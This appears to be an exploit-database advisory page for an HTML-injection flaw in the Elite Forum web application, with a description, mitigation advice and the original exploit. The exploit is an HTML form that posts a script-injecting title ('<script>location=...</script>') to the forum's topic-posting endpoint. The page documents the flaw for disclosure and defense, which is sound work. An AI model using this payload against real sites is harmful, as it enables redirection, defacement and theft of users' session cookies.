header-logo
Suggest Exploit
vendor:
Elite Forum
by:
St@rEXT
7.5
CVSS
HIGH
HTML Injection
79
CWE
Product Name: Elite Forum
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Elite Forum HTML Injection Vulnerability

The Elite Forum application fails to properly sanitize user-supplied input before using it in dynamically generated content. This allows an attacker to inject HTML and script code into the affected website, potentially leading to the theft of authentication credentials and control over the site's rendering.

Mitigation:

To mitigate this vulnerability, the application should properly sanitize user-supplied input before using it in any dynamically generated content. Input validation and encoding techniques should be implemented.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15257/info

Elite Forum is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. 

<title>Elite Forum FULL HTML ENjocter-By St@rEXT</title>
<style>
body{background:url(http://img523.imageshack.us/img523/7704/turkeyflag0xuhz9zc7uf0.jpg);
color:#FFFFFF;
font-weight:bold;}
input{
background-color:darkred;
color:#FFFFFF;
font-weight:bold;
}
</style
<form method=POST action="http://site/path/index.php?act=ptopic&fid=1"
target=_blank>
<b><em><h2><b>Elite Forum FULL HTML ENjocter-By
St@rEXT</b></h2></em></b></font>
        <br>

        <b>Your HTML C0de : <br></b>
        <input  size="60" type="text"  name="title"
value='<script>location="http://yourindex.html"</script>'>

        <BR><BR><BR><b>Forum Messages:</b><BR>

        <input cols=2 rows=1 name='post'value='Bug On!!!'><BR><BR><br>
<input type=submit value="Send and Hacked">
        <BR><BR>


        <BR><BR><BR>
        </form>